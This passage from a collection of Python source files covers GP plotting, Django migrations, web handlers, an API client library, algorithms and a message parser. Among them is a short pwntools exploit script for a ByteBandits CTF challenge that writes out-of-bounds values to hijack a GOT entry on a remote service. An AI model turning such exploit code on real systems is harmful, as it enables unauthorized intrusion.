np.sin(x) + 0.5* np.random.randn(len(x))\n\n\n### The training data plot\n\nfig = plt.figure(figsize=thesis.figsize); ax = fig.add_subplot(111)\n#ax.plot(X, y, '--', color=cm(0.4))\nax.plot(x, y, '.', ms=3, c='k');\nax.set_xlabel(\"$x$\");\nax.set_ylabel(\"$f(x)$\");\nplt.tight_layout()\nfig.savefig(\"../figures/gp-training-data.pdf\")\n\n\n### The Gaussian process posterior plot\n\n\nwith pm.Model() as model:\n ls = pm.HalfCauchy(\"metric\", 2)\n # Specify the covariance function.\n cov_func = pm.gp.cov.ExpQuad(1, ls)\n # Specify the GP. The default mean function is `Zero`.\n gp = pm.gp.Marginal(cov_func=cov_func)\n sigma = pm.Normal(\"sigma\", .5, 2)\n y_ = gp.marginal_likelihood(\"y\", X=x[::,None], y=y, noise=sigma)\nwith model:\n mp = pm.find_MAP()\n\nx_new = np.linspace(0,10, 200)[::,None]\nmu, var = gp.predict(x_new, point=mp, diag=True)\nsd = np.sqrt(var)\n\n# draw plot\nfig = plt.figure(figsize=thesis.figsize); ax = fig.add_subplot(111)\n\n# plot mean and 2 sigma intervals\nplt.plot(x_new, mu, 'r', lw=2, label=\"mean and 2 sigma region\");\nfor deviation in range(1,4):\n plt.fill_between(x_new.flatten(), mu - deviation*sd, mu + deviation*sd, color=thesis.colors['red'], alpha=0.5/deviation)\n\n# plot original data and true function\nplt.plot(x, y, 'ok', ms=1, alpha=1.0, label=\"observed data\");\n\nplt.xlabel(\"x\");# plt.ylim([-13,13]);\nplt.tight_layout()\n\n\n### The Gaussian process prior plot using the appropriate length scale\n\nls = float(mp['metric'])\n#ls= 0.25\n\n\nwith pm.Model() as model:\n # Specify the covariance function.\n cov_func = pm.gp.cov.ExpQuad(1, ls)\n # Specify the GP. The default mean function is `Zero`.\n gp = pm.gp.Marginal(cov_func=cov_func)\n sigma = pm.Normal(\"sigma\", 1, 5)\n y_ = gp.marginal_likelihood(\"y\", X=x[::,None], y=y, noise=sigma)\n\n \nfig = plt.figure(figsize=thesis.figsize)\nax = fig.add_subplot(111)\nK = cov_func(x[::,None]).eval()\nax.plot(x, pm.MvNormal.dist(mu=np.zeros(K.shape[0]), cov=K).random(size=15).T, \n alpha = 0.5, c=thesis.colors['blue'], lw=1, linestyle=\"--\"\n );\nax.set_xlabel(\"$x$\")\nax.set_ylabel(\"$f(x)$\")\nfig.tight_layout();\nfig.savefig(\"../figures/gp-example-prior-draws.pdf\")\n","sub_path":"scripts/gp-example-plots.py","file_name":"gp-example-plots.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"460037313","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport audit_log.models.fields\nimport django.utils.timezone\nfrom django.conf import settings\nimport django_extensions.db.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('finances', '0005_auto_20141014_1827'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Setting',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', django_extensions.db.fields.CreationDateTimeField(default=django.utils.timezone.now, verbose_name='created', editable=False, blank=True)),\n ('modified', django_extensions.db.fields.ModificationDateTimeField(default=django.utils.timezone.now, verbose_name='modified', editable=False, blank=True)),\n ('created_with_session_key', audit_log.models.fields.CreatingSessionKeyField(max_length=40, null=True, editable=False)),\n ('modified_with_session_key', audit_log.models.fields.LastSessionKeyField(max_length=40, null=True, editable=False)),\n ('base_currency', models.CharField(default=b'EUR', unique=True, max_length=3, verbose_name=b'currency')),\n ('created_by', audit_log.models.fields.CreatingUserField(related_name=b'created_setting_set', editable=False, to=settings.AUTH_USER_MODEL, null=True, verbose_name='created by')),\n ('modified_by', audit_log.models.fields.LastUserField(related_name=b'modified_setting_set', editable=False, to=settings.AUTH_USER_MODEL, null=True, verbose_name='modified by')),\n ],\n options={\n 'ordering': ['-id'],\n 'verbose_name': 'Setting',\n 'verbose_name_plural': 'Settings',\n },\n bases=(models.Model,),\n ),\n migrations.AlterField(\n model_name='transaction',\n name='unit_value',\n field=models.DecimalField(verbose_name=b'unit value', max_digits=10, decimal_places=2, blank=True),\n ),\n migrations.AlterField(\n model_name='transaction',\n name='value',\n field=models.DecimalField(verbose_name=b'value', max_digits=10, decimal_places=2, blank=True),\n ),\n migrations.AlterField(\n model_name='transaction',\n name='value_euro',\n field=models.DecimalField(verbose_name=b'value EUR', max_digits=10, decimal_places=2, blank=True),\n ),\n ]\n","sub_path":"src/apps/finances/migrations/0006_auto_20141014_2234.py","file_name":"0006_auto_20141014_2234.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"124020027","text":"import logging\nimport json\n\nimport tornado\nimport tornado.gen\n\nfrom collections import OrderedDict\n\nfrom tornado.web import HTTPError\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom ..db.models import GeneralStatementInfo\nfrom ..handlers import BaseRequestHandler\n\nlog = logging.getLogger(__name__)\n\nclass WorkStatementRequestHandler(BaseRequestHandler):\n\n\tdef exit_with_error(self, status_code, error_message, error_to_log=None):\n\t\tif error_to_log:\n\t\t\tlog.error(error_to_log)\n\t\tself.set_status(status_code)\n\t\tself.write({'error':{'message':error_message}})\n\t\tself.finish()\n\n\tdef prepare(self):\n\t\tif self.request.body:\n\t\t\ttry:\n\t\t\t\tself.request_body = json.loads(self.request.body.decode('utf-8'))\n\t\t\texcept ValueError as ex:\n\t\t\t\tself.exit_with_error(400, 'Bad Request: Invalid JSON', ex)\n\n\tdef check_field_keys(self, field_keys, data):\n\t\tcode = None\n\t\terror_message = None\n\t\tfor key in field_keys:\n\t\t\tif not key in data:\n\t\t\t\terror_message = 'Bad Request: Missing attribute: {0}'.format(key)\n\t\treturn code, error_message\n\n\tdef exit_with_success(self, status_code, message):\n\t\tself.set_status(status_code)\n\t\tif message != None:\n\t\t\tself.write(message)\n\t\tself.finish()\n\nclass MainHandler(WorkStatementRequestHandler):\n\n\t@tornado.web.asynchronous\n\tdef get(self):\n\t\ttry:\n\t\t\tgeneral_statement_info = self.db.query(GeneralStatementInfo).all()\n\n\t\t\tresponse_body = self._get_years_and_companies(general_statement_info)\n\t\t\tcode = 200\n\t\texcept SQLAlchemyError as ex:\n\t\t\tresponse_body = 'Internal Server Error: Unable to get list of companies and years'\n\t\t\tcode = 500\n\n\t\tif code == 200:\n\t\t\tself.exit_with_success(code, response_body)\n\t\telif code == 500:\n\t\t\tself.exit_with_error(code, response_body, ex)\n\n\n\tdef _get_years_and_companies(self, general_statement_info):\n\t\tyears = []\n\t\tcompanies = []\n\n\t\tfor year in general_statement_info:\n\t\t\tyears.append(year.to_dict_return_dates())\n\n\t\tfor company in general_statement_info:\n\t\t\tcompanies.append(company.to_dict_return_companies())\n\n\t\tresponse_body = {\n\t\t\t'data':{\n\t\t\t\t'years': list(OrderedDict.fromkeys(years)),\n\t\t\t\t'companies': list(OrderedDict.fromkeys(companies))\n\t\t\t}\n\t\t}\n\n\t\treturn response_body\n\nclass GeneralStatementInfoHandler(WorkStatementRequestHandler):\n\n\t@tornado.web.asynchronous\n\tdef post(self):\n\t\tgeneral_statement_info_data = self.request_body\n\t\tfield_keys = [\n\t\t\t'rate',\n\t\t\t'hours',\n\t\t\t'company_name',\n\t\t\t'payment_date'\n\t\t]\n\n\t\t(code, response_body) = self.check_field_keys(field_keys, general_statement_info_data)\n\t\tif code == 400:\n\t\t\tself.exit_with_error(code, response_body)\n\t\telse:\n\t\t\tself._add_general_statement_info(general_statement_info_data)\n\n\tdef _add_general_statement_info(self, general_statement_info_data):\n\t\ttry:\n\t\t\tgeneral_statement_info = GeneralStatementInfo(**general_statement_info_data)\n\t\t\tself.db.add(general_statement_info)\n\t\t\tself.db.commit()\n\t\t\tcode = 201\n\t\t\trequest_body = {\n\t\t\t\t'data':{\n\t\t\t\t\t'general_statement_info':general_statement_info.to_dict()\n\t\t\t\t}\n\t\t\t}\n\t\texcept SQLAlchemyError as ex:\n\t\t\trequest_body = 'Internal Server Error: Unable to create general statement info'\n\t\t\tcode = 500\n\n\t\tif code == 201:\n\t\t\tself.exit_with_success(201, request_body)\n\t\telif code == 500:\n\t\t\tself.exit_with_error(code, response_body, ex)","sub_path":"server/bank/work_statement/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"393114491","text":"from ceilometerclient import client as ceil_client\n\ndef get_client(auth_token):\n version = 2\n scheme = 'http'\n host = '172.18.31.17'\n port = '8777'\n ceil_endpoint = '%s://%s:%s' % (scheme, host, port)\n cclient = ceil_client.Client(version, endpoint=ceil_endpoint, token=auth_token)\n return cclient\n\nclass Manager():\n\n @classmethod\n def get_alarm(cls, alarm_id, token):\n cclient = get_client(token)\n alarm = cclient.alarms.get(alarm_id)\n return alarm\n\n","sub_path":"api/rest/ceilometer.py","file_name":"ceilometer.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"55599080","text":"import hashlib\nimport logging\nimport os\ntry:\n from urllib import parse as urllib\nexcept ImportError:\n import urllib\nfrom types import MethodType\n\nimport gevent\nfrom cachetools.keys import _HashedTuple\nfrom django.core.cache import caches\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.utils import six\nfrom json import dumps as to_json\nimport requests\nfrom requests.adapters import HTTPAdapter\nfrom urllib3 import Retry\nfrom jangl_utils import logger, settings, VERSION\nfrom jangl_utils.etc.json import _datetime_decoder\n\n\nBACKEND_USER_AGENT = 'JanglBackendAPI/{}'.format(VERSION)\nBACKEND_CONTENT_TYPE = 'application/json'\n\nMAX_ASYNC_POOLS = 100\nMAX_ASYNC_POOL_CONNECTIONS = 100\nMAX_RETRIES = Retry(3, backoff_factor=0.25)\n\n\ndef get_service_url_base(service):\n explicit_url = 'JANGL_{}_URL'.format(service.upper())\n if os.environ.get(explicit_url):\n return os.environ[explicit_url]\n return settings.SERVICES_URL_TEMPLATE.format(\n HOST=settings.SERVICES_BACKEND_HOST,\n PORT=settings.SERVICES_BACKEND_PORT,\n SERVICE=service\n )\n\n\ndef get_service_url(service, *args, **kwargs):\n service_url = get_service_url_base(service)\n\n trailing_slash = kwargs.get('trailing_slash', True) and '/' or ''\n query_string = kwargs.get('query_string')\n if isinstance(query_string, dict):\n query_string = urllib.urlencode(query_string)\n query_string = '?' + query_string if query_string else ''\n\n url_path = ('/' + '/'.join(map(str, args))) if args else ''\n return ''.join((service_url, url_path, trailing_slash, query_string))\n\n\nclass BackendAPIJSONEncoder(DjangoJSONEncoder):\n def default(self, o):\n try:\n return super(BackendAPIJSONEncoder, self).default(o)\n except TypeError:\n return str(o)\n\n\ndef decode_json(r, *args, **kwargs):\n def json(self, **kwargs):\n kwargs['object_hook'] = _datetime_decoder\n return self._json(**kwargs)\n\n r._json = r.json\n r.json = MethodType(json, r)\n return r\n\n\nclass BackendAPISession(requests.Session):\n\n def __init__(self):\n super(BackendAPISession, self).__init__()\n self.hooks.setdefault('response', []).append(decode_json)\n\n @property\n def session_cid(self):\n return self.headers.get(settings.CID_HEADER_NAME)\n\n def request(self, method, url, params=None, data=None, headers=None, cookies=None, files=None, auth=None,\n timeout=None, allow_redirects=True, proxies=None, hooks=None, stream=None, verify=None, cert=None,\n json=None, **kwargs):\n site_id = kwargs.pop('site_id', None)\n force_json = kwargs.pop('force_json', True)\n\n if isinstance(url, (tuple, list)):\n url = get_service_url(url[0], *url[1:], **kwargs)\n if data:\n if isinstance(data, six.text_type):\n data = data.encode('utf-8')\n elif force_json and not isinstance(data, six.string_types):\n data = to_json(data, cls=BackendAPIJSONEncoder)\n\n if site_id:\n if headers is None:\n headers = {}\n headers['X-Site-ID'] = str(site_id)\n\n self._log('request', method.upper(), url)\n self._debug(data)\n\n response = super(BackendAPISession, self).request(\n method,\n url,\n params=params,\n data=data,\n headers=headers,\n cookies=cookies,\n files=files,\n auth=auth,\n timeout=timeout,\n allow_redirects=allow_redirects,\n proxies=proxies,\n hooks=hooks,\n stream=stream,\n verify=verify,\n cert=cert,\n json=json,\n )\n\n self._log('response', response.status_code, response.url)\n if not stream:\n self._debug(response.text)\n\n return response\n\n def update_session_headers(self, cid=None, site_id=None, host=None, authorization=None,\n api_token=None, account=None, twilio_signature=None, cookies=None):\n if cid:\n self.headers[settings.CID_HEADER_NAME] = str(cid)\n\n if site_id:\n self.headers['X-Site-ID'] = str(site_id)\n elif host:\n self.headers['Host'] = str(host)\n\n if authorization:\n self.headers['Authorization'] = authorization\n elif api_token:\n if isinstance(api_token, dict):\n auth = '{0} {1}'.format('Bearer', api_token['access_token'])\n else:\n auth = '{0} {1}'.format('JWT', api_token)\n self.headers['Authorization'] = auth\n\n if account:\n self.headers['X-Auth-Account'] = account\n\n if twilio_signature:\n self.headers['X-Twilio-Signature'] = twilio_signature\n\n if cookies:\n requests.utils.add_dict_to_cookiejar(self.cookies, cookies)\n\n def _log(self, log_type, *args):\n cid = '[{}] '.format(self.session_cid) if self.session_cid else ''\n logger.info('{}API {} - {}'.format(cid, log_type.upper(), ' '.join(map(str, args))))\n\n def _debug(self, data):\n if data:\n log_level = getattr(logging, settings.BACKEND_API_VERBOSE_LOG_LEVEL)\n logger.log(log_level, data)\n\n\nclass CachedBackendAPISession(BackendAPISession):\n cache_methods = ['GET', 'OPTIONS', 'HEAD']\n cache_use_headers = ['auth', 'cookies', 'host', 'site_id']\n\n def request(self, *args, **kwargs):\n is_cachable, cache_key, cache_seconds, cache_refresh = self.get_cache_vars(args, kwargs)\n if is_cachable:\n response = self.cache.get(cache_key, version=settings.BACKEND_API_CACHE_VERSION)\n\n # If cache miss, refresh cache\n if response is None:\n response = self.refresh_cache(cache_key, cache_seconds, *args, **kwargs)\n\n else:\n self._log('cache hit', response.url)\n self._debug(response.text)\n\n # If cache hit and passed refresh timer, refresh cache in background\n cache_ttl = self.cache.ttl(cache_key, version=settings.BACKEND_API_CACHE_VERSION) or 0\n if cache_refresh is not None and cache_refresh < (cache_seconds - cache_ttl):\n self._log('cache refresh', 'TTL:', cache_ttl)\n gevent.spawn(self.refresh_cache, cache_key, cache_seconds, *args, **kwargs)\n\n return response\n return super(CachedBackendAPISession, self).request(*args, **kwargs)\n\n @property\n def cache(self):\n return caches[settings.BACKEND_API_CACHE]\n\n def get_cache_vars(self, args, kwargs):\n cache_seconds = kwargs.pop('cache_seconds', 0)\n cache_refresh = kwargs.pop('cache_refresh', None)\n cache_methods = kwargs.pop('cache_methods', None)\n use_headers = kwargs.pop('cache_use_headers', None)\n extra_headers = kwargs.pop('cache_extra_headers', {})\n\n if cache_methods is None:\n cache_methods = self.cache_methods\n if use_headers is None:\n use_headers = self.cache_use_headers\n if extra_headers is None:\n extra_headers = {}\n\n method = args[0].upper()\n\n is_cachable = method in cache_methods and cache_seconds\n if is_cachable:\n cache_headers = self.get_cache_headers(use_headers, **extra_headers)\n cache_key = self.get_cache_key(cache_headers, *args, **kwargs)\n else:\n cache_key = None\n return is_cachable, cache_key, cache_seconds, cache_refresh\n\n def refresh_cache(self, cache_key, cache_seconds, *args, **kwargs):\n response = super(CachedBackendAPISession, self).request(*args, **kwargs)\n if response.ok:\n self.cache.set(cache_key, response, cache_seconds, version=settings.BACKEND_API_CACHE_VERSION)\n return response\n\n def get_cache_key(self, *args, **kwargs):\n args = make_hashable(args)\n kwargs = dict(make_hashable(kwargs))\n hash_key = '{}'.format(_HashedTuple(args + sum(sorted(kwargs.items()), (None,))))\n hashed = hashlib.sha1(hash_key.encode('utf8')).hexdigest()\n return 'backend_api:{}'.format(hashed)\n\n def get_cache_headers(self, use_headers, **extra_headers):\n headers = {\n 'auth': self.headers.get('Authorization'),\n 'cookies': self.cookies.get_dict(),\n 'host': self.headers.get('Host'),\n 'site_id': self.headers.get('X-Site-ID'),\n }\n headers.update(extra_headers)\n return dict(((k, v) for k, v in six.iteritems(headers) if k in use_headers))\n\n\ndef get_backend_api_session(cached=settings.ENABLE_BACKEND_API_CACHE, **kwargs):\n if cached:\n api_session = CachedBackendAPISession()\n else:\n api_session = BackendAPISession()\n\n adapter = HTTPAdapter(pool_connections=kwargs.pop('max_async_pools', MAX_ASYNC_POOLS),\n pool_maxsize=kwargs.pop('max_async_pool_connections', MAX_ASYNC_POOL_CONNECTIONS),\n max_retries=kwargs.pop('max_retries', MAX_RETRIES))\n api_session.mount('http://', adapter)\n api_session.mount('https://', adapter)\n api_session.headers.update({\n 'Content-Type': kwargs.pop('backend_content_type', BACKEND_CONTENT_TYPE),\n 'User-Agent': kwargs.pop('backend_user_agent', BACKEND_USER_AGENT),\n })\n api_session.update_session_headers(**kwargs)\n return api_session\n\n\ndef make_hashable(value):\n if hasattr(value, 'iteritems') or hasattr(value, 'items'):\n return tuple(sorted([(k, make_hashable(v)) for k, v in six.iteritems(value)]))\n if isinstance(value, (list, tuple)):\n return tuple([make_hashable(v) for v in value])\n return value\n","sub_path":"jangl_utils/backend_api/old.py","file_name":"old.py","file_ext":"py","file_size_in_byte":9757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"25710759","text":"import argparse\nimport cv2\nimport h5py\nimport os\nimport string\nimport datetime\n\nfrom data import preproc as pp, evaluation\nfrom data.generator import DataGenerator, Tokenizer\nfrom data.reader import Dataset\nfrom network.model import HTRModel\n\nif __name__ == \"__main__\":\n \n input_size = (1024, 128, 1)\n max_text_length = 128\n charset_base = string.printable[:95]\n target_path='/data2/pavan/handwritten-text-recognition/output/iam/flor/checkpoint_weights.hdf5'\n tokenizer = Tokenizer(chars=charset_base, max_text_length=max_text_length)\n image=input('enter your image path:')\n img = pp.preprocess(image, input_size=input_size)\n x_test = pp.normalization([img])\n\n model = HTRModel(architecture='flor',\n input_size=input_size,\n vocab_size=tokenizer.vocab_size,\n top_paths=10)\n\n model.compile()\n model.load_checkpoint(target=target_path)\n\n predicts, probabilities = model.predict(x_test, ctc_decode=True)\n predicts = [[tokenizer.decode(x) for x in y] for y in predicts]\n\n print(\"\\n####################################\")\n for i, (pred, prob) in enumerate(zip(predicts, probabilities)):\n print(\"\\nProb. - Predict\")\n\n for (pd, pb) in zip(pred, prob):\n print(f\"{pb:.4f} - {pd}\")\n\n cv2.imshow(f\"Image {i + 1}\", cv2.imread(image))\n print(\"\\n####################################\")\n cv2.waitKey(0)\n","sub_path":"src/htr.py","file_name":"htr.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"326440287","text":"\"\"\"\n给一个整数数组 arr,找到其中最长严格递增子序列的长度。\n\"\"\"\n\n# 时间复杂度 O(N^2)\n# dp[i] 代表以 arr[i]结尾的最长子序列长度\n# 遍历数组,找到 arr[i] 左边比它小的元素 arr[j]\n# 如果dp[j]+1 > dp[i],更新当前dp[i]即可\ndef longestIncreasingSubsequence1(arr):\n n = len(arr)\n dp = [1] * n\n\n for i in range(1, n):\n for j in range(i):\n if arr[i] > arr[j] and dp[j] + 1 > dp[i]:\n dp[i] = dp[j] + 1\n return max(dp)\n\n\n# 二分查找,时间复杂度降到O(NlogN)\n# ends[k] 代表 所有 k+1 长度的子序列,最小的结尾数\ndef LIS(arr):\n ends = [0] * len(arr)\n ans = 0\n\n # 找到 e 在 ends 数组中可以存放的位置\n for e in arr:\n i, j = 0, ans\n\n while i < j:\n m = (i + j) // 2\n if ends[m] < e:\n i = m + 1\n else:\n j = m\n\n ends[i] = e\n if j == ans:\n ans += 1\n\n return ans","sub_path":"DynamicProgramming/lengthOfLIS.py","file_name":"lengthOfLIS.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"97237958","text":"'''\r\nCreated on 6 oct. 2016\r\n\r\n@author: C308684\r\n'''\r\nimport re\r\nfrom macpath import split\r\n\r\nclass LaboratoryI:\r\n '''\r\n classdocs\r\n '''\r\n\r\n\r\n def __init__(self):\r\n '''\r\n Constructor\r\n '''\r\n \r\n def cmmdc(self, *numbers):\r\n '''\r\n 1\r\n I find all divisors of the firs number.\r\n II going from biggest to lowest, find the \r\n max divisor of the first number that divides the others\r\n '''\r\n firstNumber = numbers[0]\r\n firstNumberDividers = []\r\n index = 0;\r\n for divider in range(1, firstNumber + 1):\r\n if (firstNumber % divider) == 0:\r\n firstNumberDividers.append(divider)\r\n index = index + 1\r\n \r\n currentMaxDivider = 1\r\n goodDivider = True\r\n for divider in firstNumberDividers:\r\n goodDivider = True\r\n for number in numbers:\r\n if(number % divider) != 0:\r\n goodDivider = False\r\n break;'This divider is not shared by all numbers'\r\n if goodDivider == True :\r\n currentMaxDivider = divider\r\n return currentMaxDivider\r\n\r\n def vowelCounter(self, string):\r\n '''\r\n 2. Scrieti o functie care calculeaza cate vocale sunt intr-un sir de caractere\r\n '''\r\n vowelCounter = 0\r\n vowels = [\"a\",\"e\",\"i\",\"o\",\"u\"]\r\n for character in list(string) :\r\n if character in vowels:\r\n vowelCounter += 1\r\n return vowelCounter\r\n \r\n def wordCounter(self, string):\r\n '''\r\n 3. Scrieti o functie care returneaza \r\n numarul de cuvinte care exista intr-un string. \r\n Cuvintele sunt separate de spatii, semne \r\n de punctuatie (, ;, ? ! . )\r\n ''' \r\n regex = r\"(([\\s!?&,]{1,})|([\\/.]{1,}[\\s!?&]{1,}))(?=[a-zA-Z0-9]{1,})\"\r\n matches = re.finditer(regex, string)\r\n for wordCount, match in enumerate(matches):\r\n wordCount = wordCount + 1\r\n # Check the first character of the string to see if it's a word or not.\r\n # if it's not a word the decrease the wordCount\r\n return wordCount + 1\r\n \r\n def stringOcurrencesCounter(self, needle, hystack):\r\n '''\r\n 4. Scrieti o functie care primeste ca \r\n parametri doua siruri de caractere si care \r\n returneaza numarul de aparitii ale \r\n primului sir de caractere in al doilea.\r\n '''\r\n needleLetters = list(needle)\r\n hystackLetters = list(hystack)\r\n \r\n isMatched = True\r\n numberOfOccurences = 0\r\n \r\n shift = 0\r\n while shift < len(hystackLetters):\r\n if hystackLetters[shift] == needleLetters[0] :\r\n isMatched = True\r\n for index in range(1, len(needleLetters)):\r\n if hystackLetters[shift + index] != needleLetters[index]:\r\n isMatched = False\r\n shift = shift + 1\r\n break\r\n if isMatched == True :\r\n shift = shift + len(needleLetters)\r\n numberOfOccurences = numberOfOccurences + 1\r\n continue\r\n else:\r\n shift = shift + 1\r\n return numberOfOccurences\r\n \r\n def containsSpecialCharacters(self):\r\n '''\r\n 5\r\n '''\r\n \r\n def convertUpperCamelCase(self):\r\n '''\r\n 6\r\n '''\r\n \r\n def pheasantChecker(self):\r\n '''\r\n 7. Scrieti o functie care primeste un integer char_len \r\n si un numar variabil de parametri (siruri de caractere) \r\n si verifica daca fiecare doua string-uri vecine \r\n respecta urmatoarea regula: al doilea string incepe cu \r\n ultimile char_len caractere a primului string (ca la fazan).\r\n '''\r\n def polinomEvaluator(self):\r\n '''\r\n 8. Se da un sir de caractere care reprezinta un polinom \r\n (Ex: \"3x^3 + 5x^2 - 2x - 5\") si un numar (intreg sau float). \r\n Sa se evalueze polinomul respectiv pentru valoarea data.\r\n '''\r\n def findLargestPrimeInString(self):\r\n '''\r\n 9. Scrieti o functie care sa returneze cel mai mare numar \r\n prim dintr-un sir de caractere dat ca parametru sau -1 daca \r\n sirul de caractere nu contine nici un numar prim. Ex: input: \r\n 'ahsfaisd35biaishai23isisvdshcbsi271cidsbfsd97sidsda'; output: 271\r\n '''","sub_path":"PracticaPython/src/lab/LaboratoryI.py","file_name":"LaboratoryI.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"61582117","text":"from pwn import *\n\n#io = process(\"./back\",env={\"LD_PRELOAD\":\"./libc.so.6\"})\n\nio = remote(\"pwn.byteband.it\",8000)\n\nio.sendlineafter(\"size: \",\"500000\")\n#315043\n\nio.sendlineafter(\"idx: \",\"509336\")\n\naddr = 0x601018\nio.recvuntil(\"where: \")\n#gdb.attach(io)\n\nio.sendline(\"6295576\")\n\n#4196310\nio.sendline(\"4195984\")\nio.interactive()\n#io.recvuntil(\"puts: \")\n#puts = int(io.recvline().strip(),16)\n#base = puts - 0x809c0\n#one_gadget = base + 0x10a398\n\n\n#print hex(base)\n\n\n\n#io.sendlineafter(\"size: \",\"500000\")\n#315043\n\n#io.sendafter(\"idx: \",\"1013145\")\n\n#addr = 0x601018\n#io.sendafter(\"where: \",str(6295576))\n#io.send(p64(one_gadget))\n","sub_path":"ByteBandits20/look/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"596097893","text":"import time\r\n\r\n\r\ndef lten(x):\r\n if x < 10:\r\n return \"0\" + str(x)\r\n else:\r\n return x\r\n\r\n\r\nseconds = time.time()\r\n\r\n\r\nhour = 0\r\nminutes = 0\r\n\r\nwhile True:\r\n time.sleep(1)\r\n now = round(time.time() - seconds)\r\n if minutes == 60 and seconds == 60:\r\n minutes += 1\r\n seconds = time.time()\r\n print(str(lten(hour)) + \":\" + str(lten(minutes)) + \":\" + str(lten(0)))\r\n else:\r\n if now == 60:\r\n seconds = time.time()\r\n minutes += 1\r\n print(str(lten(hour)) + \":\" + str(lten(minutes)) + \":\" + str(lten(0)))\r\n else:\r\n print(str(lten(hour)) + \":\" +\r\n str(lten(minutes)) + \":\" + str(lten(now)))\r\n","sub_path":"5-eindopdracht/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"338168088","text":"# Binary Tree From Inorder And Preorder\n\n# Problem Description\n# Given preorder and inorder traversal of a tree, construct the binary tree.\n# NOTE: You may assume that duplicates do not exist in the tree.\n\n# Problem Constraints\n# 1 <= number of nodes <= 10^5\n\n# Input Format\n# First argument is an integer array A denoting the preorder traversal of the tree.\n# Second argument is an integer array B denoting the inorder traversal of the tree.\n\n# Output Format\n# Return the root node of the binary tree.\n\n# Example Input\n\n# Input 1:\n# A = [1, 2, 3]\n# B = [2, 1, 3]\n\n# Input 2:\n# A = [1, 6, 2, 3]\n# B = [6, 1, 3, 2]\n\n# Example Output\n\n# Output 1:\n# 1\n# / \\\n# 2 3\n\n# Output 2:\n# 1 \n# / \\\n# 6 2\n# /\n# 3\n\n# Example Explanation\n\n# Explanation 1:\n# Create the binary tree and return the root node of the tree.\n\n# Definition for a binary tree node\n# class TreeNode:\n#\tdef __init__(self, x):\n#\t\tself.val = x\n#\t\tself.left = None\n#\t\tself.right = None\n\nclass Solution:\n\t# @param A : list of integers\n\t# @param B : list of integers\n\t# @return the root node in the tree\n\tdef buildTree(self, A, B):\n\t \n\t if not B:\n\t return\n\t \n\t root_position = B.index(A[0])\n\t tree = TreeNode(A[0])\n\t tree.left = self.buildTree(A[1:root_position+1], B[:root_position])\n\t tree.right = self.buildTree(A[root_position+1:], B[root_position+1:])\n\t \n\t return tree","sub_path":"Trees/Trees-1-HW_BT_from_inorder_and_preorder.py","file_name":"Trees-1-HW_BT_from_inorder_and_preorder.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"257876980","text":"import struct\n\nfrom mx_util import Util\nfrom mx_sender import Sender\n\n\n# 接收消息后进行分支处理\nclass Flow:\n\n def __init__(self):\n self.util = Util()\n self.sender = Sender()\n\n def recInfo(self, data):\n self.head = data[0: 16]\n\n self.frameys, \\\n self.len, \\\n self.type, \\\n self.sink, \\\n self.src, \\\n self.time, \\\n self.retransTime, \\\n self.vertifyIndex, \\\n self.cycFrameNo, \\\n self.crcSum \\\n = struct.unpack('3H2cI4c', self.head)\n\n if 0x90eb == hex(self.frameys):\n # 发送帧同步错误帧\n info = struct.pack('BBHL', 0x11, 0, 0, 0)\n self.createMsg(self.src, self.sink, self.type, info, False)\n return\n\n if int(self.len) == len(data):\n # 发送帧长度错误帧\n info = struct.pack('BBHL', 0x22, 0, 0, 0)\n self.createMsg(self.src, self.sink, self.type, info, True)\n return\n\n if not self.checkType(self.src, self.sink, self.type):\n # 发送帧类型错误帧\n info = struct.pack('BBHL', 0x33, 0, 0, 0)\n self.createMsg(self.src, self.sink, self.type, info, False)\n return\n\n if not self.checkSum(data):\n # 发送校验和错误帧\n info = struct.pack('BBHL', 0x11, 0, 0, 0)\n self.createMsg(self.src, self.sink, self.type, info, False)\n return\n\n if self.frameType == 0x0001:\n # 某某消息,并发送回令\n print(\"接收自检消息\")\n\n def checkType(self, src, sink, type):\n if src == b'\\x30':\n print(\"车长软件发送消息\")\n # return False\n elif src == b'\\x11':\n print(\"测发控软件发送消息\")\n elif src == b'\\x51':\n print(\"任务规划软件发送消息\")\n\n if sink != b'\\x51':\n print(\"帧类型错误\")\n return False\n return True\n\n def checkSum(self, data):\n sum = 0\n for i in data:\n sum += i\n if sum == 0:\n return True\n else :\n return False\n\n def createMsg(self, src, sink, type, info, hasReply):\n frameys = 0x90eb\n length = len(info) + 16\n\n # bytes强制转换为int\n src = int.from_bytes(src, byteorder='big', signed=True)\n sink = int.from_bytes(sink, byteorder='big', signed=True)\n\n frameType = self.util.getFrameType(src, sink, type)\n\n # 